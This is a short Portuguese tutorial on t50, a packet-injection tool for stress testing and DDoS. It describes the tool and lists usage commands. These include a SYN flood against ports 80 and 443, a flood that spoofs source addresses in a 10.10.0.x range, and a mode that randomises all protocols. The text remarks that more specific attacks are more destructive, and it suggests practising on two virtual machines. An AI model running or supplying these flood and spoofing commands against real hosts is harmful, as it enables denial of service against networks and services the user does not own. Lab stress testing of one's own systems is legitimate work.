Conheça e entenda como usar o t50

Prévia do material em texto

Conheça o t50: Ferramenta 
para stress test (Pentest 
DDoS)! 
 
O t50, uma ferramenta desenvolvida pelo brasileiro Nelson Brito, é na prática um 
software capaz de realizar stress tests em redes ou servidores específicos utilizando 
a técnica de injeção de pacotes mesclando até 15 protocolos diferentes (TCP, UDP, 
ICMP, IGMPv2, IGMPv3, EGP, DCCP, RSVP, RIPv1, RIPv2, GRE, ESP, AH, EIGRP, 
OSPF, etc…). Em outras palavras, qualquer sysadmin pode utilizar esta ferramenta 
para realizar testes de penetração em servidores utilizando um mix de ataques do 
tipoDDoS (Distributed Denial of Service) – Basicamente como ocorreu nos 
episódios dos últimos dias em sites do governo federal, quando crackers utilizaram 
técnicas do tipo. Obviamente que, como toda ferramenta do gênero, o t50 pode ser 
utilizado tanto pelo “lado negro da força”, quanto para antever falhas críticas de 
segurança nos serviços que rodam na sua rede. 
Como usar 
Vamos explorar um pouco o T50 
 
 
./t50 192.168.1.10 --flood --turbo --dport (80 443) -S --protocol TCP 
Neste o atacante flooda o IP, adiciona turbo, ataca as portas 80 e 443, usando apenas SYN no protocolo 
TCP 
 
./t50 192.168.1.12 --flood --turbo --dport (80) -S -s 10.10.0. --protocol TCP 
Neste o atacando flooda o IP, adiciona turbo, ataca a porta 80 usando apenas SYN e mascara a origem 
com o range 10.10.0.x no protocolo TCP 
 
--protocol T50 
Faz um random de todos os protocolos 
 
--sport 80 --dport 443 
Ataca através da porta de origem 80 no alvo 443 
 
Quanto mais específico o ataque melhor, mais destrutivo. 
Faça um teste, crie 2 maquinas virtuais e faça o ataque. 
Monitore com o Htop ou iptraf e vc verá a diferença 
Download http://sourceforge.net/projects/t50/